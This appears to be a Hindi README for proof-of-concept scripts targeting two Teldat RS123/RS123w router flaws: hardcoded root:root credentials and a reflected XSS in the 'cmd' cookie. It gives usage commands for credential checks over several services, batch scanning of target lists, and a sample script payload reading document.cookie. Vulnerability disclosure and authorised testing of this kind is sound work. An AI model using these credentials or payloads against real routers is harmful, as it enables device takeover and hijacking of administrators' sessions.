
CVE-2022-39996 (Reflected XSS) और CVE-2022-39997 (Weak Password) के लिए POC, Teldat RS123/RS123w Router में
टेल्डैट RS123 / RS123w राउटर्स में खोजी गई दो कमजोरियों का प्रूफ ऑफ कॉन्सेप्ट।
| CVE आईडी | प्रकार | CWE | CVSS | गंभीरता |
|---|---|---|---|---|
| CVE-2022-39996 | परावर्तित XSS | CWE-79 | 6.1 | मध्यम |
| CVE-2022-39997 | कमज़ोर पासवर्ड | CWE-521 | 9.8 | गंभीर |
प्रभावित उत्पाद: टेल्डैट RS123, RS123w राउटर
टेल्डैट RS123/RS123w राउटर root:root के हार्डकोडेड डिफ़ॉल्ट क्रेडेंशियल्स के साथ आते हैं। प्रशासक अक्सर इन्हें अपरिवर्तित छोड़ देते हैं, जिससे अप्रमाणित हमलावरों को टेलनेट, SSH, HTTP या अन्य सेवाओं के माध्यम से पूर्ण प्रशासनिक पहुंच प्राप्त करने की अनुमति मिलती है।
Account: root
Password: root

pip install requests paramiko
# Basic check (Telnet, SSH, HTTP)
python CVE-2022-39997.py -t 192.168.1.1
# Full check (all services including HTTPS, FTP)
python CVE-2022-39997.py -t 192.168.1.1 --all
# Batch scan
python CVE-2022-39997.py -f targets.txt
/upgrade/index.html एंडपॉइंट, cmd HTTP कुकी के मान को बिना सैनिटाइज़ेशन के प्रतिक्रिया में प्रतिबिंबित करता है। एक हमलावर cmd कुकी में जावास्क्रिप्ट युक्त एक दुर्भावनापूर्ण अनुरोध तैयार कर सकता है। जब कोई प्रमाणित प्रशासक पेज पर जाता है, तो स्क्रिप्ट राउटर के वेब इंटरफ़ेस के ब्राउज़र संदर्भ में निष्पादित होती है, जिससे सत्र अपहरण या कॉन्फ़िगरेशन में हेरफेर संभव हो जाता है।
cmd कुकी में XSS पेलोड तैयार करना:

pip install requests
# Basic XSS check
python CVE-2022-39996.py -t 192.168.1.1
# With HTTP Basic Auth credentials
python CVE-2022-39996.py -t 192.168.1.1 -u root -p root
# Test multiple XSS payloads for confirmation
python CVE-2022-39996.py -t 192.168.1.1 --multi
# Generate standalone POC HTML page
python CVE-2022-39996.py -t 192.168.1.1 --gen-poc
# Custom XSS payload
python CVE-2022-39996.py -t 192.168.1.1 --payload "<script>alert(document.cookie)</script>"
| फ़ाइल | विवरण |
|---|---|
CVE-2022-39997.py | कमज़ोर पासवर्ड का पता लगाना (टेलनेट / SSH / HTTP / FTP) |
CVE-2022-39996.py | cmd कुकी के माध्यम से परावर्तित XSS का पता लगाना |
Teldat's Router Vulnerability.md | पूर्ण कमजोरी प्रकटीकरण रिपोर्ट |
ये POC स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए हैं। उन प्रणालियों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है। लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।